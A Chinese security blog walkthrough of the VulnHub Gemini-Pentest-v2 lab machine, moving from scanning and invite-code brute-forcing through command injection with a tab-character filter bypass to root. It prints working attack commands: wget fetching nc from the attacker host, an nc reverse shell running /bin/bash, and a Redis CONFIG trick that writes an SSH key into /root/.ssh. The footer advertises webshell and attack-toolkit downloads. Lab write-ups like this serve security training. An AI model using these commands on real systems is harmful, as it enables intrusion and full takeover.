声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/geminiinc/Gemini-Pentest-v2.zip
内容简介:
主机发现
端口扫描
隐藏路径爬取
开放注册
验证码爆破
密码破解
WAF Bypass
命令注入
黑名单绕过
SSH公钥认证
Redis漏洞利用
本地提权
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.112.133
nmap -p22,80 -sC -sV 192.168.112.133
1.3 隐藏路径爬取
dirb http://192.168.112.133 -r -X .php
通过
http://192.168.112.133/registration.php
开放注册账户并登录发现用户id
1.4 验证码爆破(csrf)
发现
http://192.168.112.133/activate.php
通过邀请码进行权限放行故爆破验证码
在其页面源码内发现存在token故用到爆破token方法
操作方法如下
-
选择Pitchfork模式
-
点击clear
-
添加参数
4.添加邀请码参数字典
5. 添加token参数字典
点击Options中的Grep-Extract添加add
点击Refetch response选中token值
修改Options中的Error Handilng值为0
选择Resource Pool模块添加线程最大次数为1
选择参数2 Recursive grep
6. 开始攻击
爆破成功邀请码为000511
1.5 密码破解
经过破解邀请码后界面功能正常
http://192.168.112.133/profile.php?u=16
经信息搜集后发现存在用户列表
http://192.168.112.133/profile.php?u=1
该页面检查页面源代码时存在加密密码
edbd1887e772e13c251f688a5f10c1ffbb67960d //SHA-1 加密
参考https://md5.cn/该网站
解密密码为secretpassword
1.6 WAF Bypass
故登录账号Gemini密码secretpassword发现有命令执行窗口
http://192.168.112.133/new-groups.php
打开该网页显示空白故需要绕过显示
这里需要用到火狐浏览器插件
直接设置127.0.0.1就好了
在去访问
http://192.168.112.133/new-groups.php
访问成功
1.7 命令注入+黑名单绕过
首先执行id命令成功但ls -la显示不可以
经多次尝试过滤掉了+故将空格替换成%09(%09=tab键)
执行成功
故往靶机上传nc然后通过nc连接
在kali上的/usr/bin目录下开启http服务
在浏览器上执行下载nc并把它放到tmp目录下
wget http://192.168.112.128/nc -O /tmp/nc
成功下载
接下来要赋予nc权限
chmod 777 /tmp/nc
/tmp/nc 192.168.112.128 4444 -e /bin/bash
成功拿到shell
python -c "import pty;pty.spawn('/bin/bash')"
1.8 SSH公钥认证+Redis漏洞利用
ss -pantu
存在6379端口redis服务开启并且是root权限
cd /etc/redis
ls
cat 6379.conf | grep pass
redis 密码 8a7b86a2cd89d96dfcc125ebcc0535e6
但是通过redis进去查看info是乱码的状态。
redis-cli -a 8a7b86a2cd89d96dfcc125ebcc0535e6
需要用到 redis 传入 公钥的方式进入
新建 .ssh文件夹
cd /home/gemini1/.ssh
/tmp/nc -nvlp 4444 > ./authorized_keys
在kali上生成公私钥对
ssh-keygen -t rsa
nc 192.168.112.133 4444 < id_rsa.pub -w 1 //把 id_rsa.pub 传输过去
靶机收到文件
ssh gemini1@192.168.112.133 //成功登录
1.10 redis公钥提权
往redis写入公钥文件
cd /home/gemini1/.ssh
cat pub.txt | redis-cli -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set ssh_key
redis-cli -a 8a7b86a2cd89d96dfcc125ebcc0535e6
CONFIG set dir /root/.ssh
config set dbfilename "authorized_keys"
save
root的ssh公钥设置成功
成功登录。。。。。。。。。
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
1、公众号后台回复:搜索大法,获取searchall工具下载链接。
2、公众号后台回复:靶场,获取靶场工具网盘下载链接。
3、公众号后台回复:webshell,获取webshell下载链接。
4、公众号后台回复:验证码,获取验证码工具下载链接。
5.公众号后台回复:应急响应,获取应急响应网盘下载链接。
6.公众号后台回复:CS,获取CS渗透工具包网盘下载链接。
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Gemini-Pentest-V2靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论